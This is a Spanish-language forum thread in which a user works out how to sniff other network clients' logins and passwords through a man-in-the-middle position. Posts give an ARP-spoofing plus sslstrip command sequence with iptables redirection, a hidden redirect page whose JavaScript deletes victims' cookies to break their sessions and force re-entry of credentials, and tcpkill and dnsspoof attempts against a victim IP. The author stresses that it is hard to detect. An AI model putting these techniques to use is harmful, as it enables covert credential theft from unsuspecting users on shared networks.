Mensajes

Buenas,
después de mucho indagar en linux sobre MITM y sus posibilidades me planteo una situación.

Quisiera saber sí existe algún script o filtro que se le aplique a Isa Server para monitorizar los login y passwords de los clientes conectados a el ya que el propio Isa Server se puede decir que hace de MITM. Se que existe cain y abel, pero ya que todo el tráfico pasa atraves del Isa Server he pensado que debería ser más fácil dado que actúa como una especie de proxy.

Thanks

[adastra]

Gracias adastra,

el programa Cain & Abel lo conocia. Sirve para hacer MITM, es decir hacer que todo el tráfico pase por el. Lo decía ya que como el ISA Server es lo mismo ya que es una especie de proxy avanzado en el cual se puede gestionar toda la red no se si existe algun script o filtro para poder leer ese trafico en concreto el HTTPS que es lo que me haría falta, pero con el Isa Server se gestiona todos los clientes, puertos, etc...

[adastra]

Tambien he notado una cosa adastra y es que si me conecto mediante eternet (eth0), los clientes wifi (wlan0) no puedo envenenarlos porque no los veo. No aparecen. No me parece muy normal, pero así es.

Ahora estoy tratando de profundizar más y me planteo otra situación:

1 servidor (controlador de dominio) el cual tiene varios clientes.
1 Microsoft Isa Server (todo el tráfico de estos clientes pasan por el).

En este caso el que hace de MITM es el Isa Server por lo que digo que si habrá alguna forma de poder hacer lo mismo. Es decir esnifar los datos.



Como poder se debe de poder porque todo el trafico pasa por el.

Sí sí lo se. lo que pasa es que lo puse para probar que realmente pasaba por esa página y ejecutaba el código. 

Pues hola de nuevo gente,

he estado realizando pruebas y puedo decir que han sido bastante positivas. Alguna pega tiene pero todo es cuestión de ir depurando, aunque tambien puedo decir que no es facil de detectar.

Comienzo por el principio y no me enrrollo...  El principal problema era que a la hora de esnifar datos de la red una vez envenenada era que aquellos clientes que tuviesen iniciada una sesión por ejemplo en su correo de Hotmail no podremos capturar sus datos ya que ya estaban introducidos cuando empezamos a esnifar. ¿Solución?. Hacer que la sesión se pierda. Para ello lo primero es eliminarle las "cookies" a nuestros cliente/s. Simplemente redirigimos todo el tráfico a una página que nosotros mismos creamos "sin contenido visible" a la cual le insertamos los siguientes códigos:

Código [Seleccionar] Expandir


//Para redirigir de nuevo a la página donde se encontraba el cliente
//Le damos 1 seg, tiempo suficiente para que se ejecute el código que me elimina las cookies

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
<script language="javascript" type="text/javascript">
if (document.cookie != "") {
if (confirm("Eliminar todas las Cookies?")) {
la_cookie = document.cookie.split("; ")
fecha_fin = new Date
fecha_fin.setDate(fecha_fin.getDate()-1)
for (i=0; i<la_cookie.length; i++) {
mi_cookie = la_cookie[i].split("=")[0]
document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
}
document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
}
}
</script>
</body>

Y listo. ¿Cual es el resultado?

EL cliente cuando navega en el momento que nosotros empezamos a esnifar la red y por tanto la redirección, cuando haga un click sobre la página que está o intente navegar verá una página en blanco durante 1 seg (igual que cuando navegamos de forma normal al cargar una nueva página) y después volverá a la que se ha solicitado con la salvedad de que se ha ejecutado durante ese segundo un código que le ha roto la sesión. A partir de ahí a divertirse.... !!!!!! 

Lógicamente seguiré probando para que todo el proceso sea más invisible pero es el paso funcional que he podido dar.

Pues prueba realizada pero sin exito.

Al ejecutar

Código [Seleccionar] Expandir

python sslstrip -p -k -w micaptura.log -l 10000 efectivamente. Se queda sin conexión. Pero totalmente. No navega, por tanto tengo que cortar todos los procesos. Hasta arpspoof para que vuelva a terner internet.

Con dnsspoof no he hecho en profundidad las pruebas pero básicamente es redirigir a otra dirección. Supongo que a esa dirección estará clonada por mi, pero el problema es el certificado. Se nota un montón (al menos con ettercap se notaba) ya que aparece el mensaje típico lo que pega un cantazo bestial.

Voy a seguir bicheando a ver que encuentro para poder cerrar una sesión. Me basta con hacerle que la cookie caduque. A ver que encuentro y os sigo comentando.

Ah, me vendría muy bien poder monitorizar no sólo un cliente, si no toda la red. Podría simplificarme la cosa pero ahora mismo estoy que no me entero por las pruebas. Si se os ocurre como....
Thanks

[adastra]

Muchas gracias por vuestro interes.
Voy a leerme la información que me has pasado adastra y de ese modo hacer pruebas con DNSSPOOF. Gracias porque además estoy aprendiendo bastante con todo ello.

Esta tarde pruebo zosemu y os comento. No se si resultará.

Os tengo informados.

Pues he probado la opción "tcpkill host <ip victima>" y efectivamente se queda sin conexión, pero cuando lo paro y actualizo la página se mantiene. Ejemplo: dentro del correo de hotmail. Ejecuto y no se puede cargar la página pero cuando pulso Crtl+C y se detiene, actualizo en el cliente y sigue dentro del correo, por tanto la sesión se mantiene.

No es una opción válida. Lo ideal sería un comando que cuando lo ejecutara al actualizar o navegar por la página le cerrara la sesión y por tanto le redirigiera a la página de login para forzarlo a introducir los datos, si no, como monitorices una conexion ya logueada sólo ves "id" y secuenciaans de numeros.

Probare reseteando el router.

Thanks

[adastra]

Muchas gracias adastra

voy a probar a ver que tal. El problema es que ettercap me da muchisimos problemas y no puedo utilizarlo. La verdad es que esa opción en ettercap era muy facil, pero no me ha dado por buscar lo que me acabas de comentar...

voy a probar y te digo, a ver que tal funciona.

Gracias!!!!!!!!!!

Hola a todos, aunque llevo tiempo siguiendo este foro hoy he decidido poner en un hilo una cuestión que me trae de cabeza.

Llevo tiempo usando sslstrip para monitorizar las conexiones SSL y junto con arpspoof pues perfecto de la siguiente manera:

Código [Seleccionar] Expandir

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
python sslstrip.py -l 8080


Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).

¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?. Con ettercap lo he hecho pero el problema es que ettercap no funciona nada bien con el sslstrip en backtrak. Me da el famoso error "send l3 error".

Gracias a todos.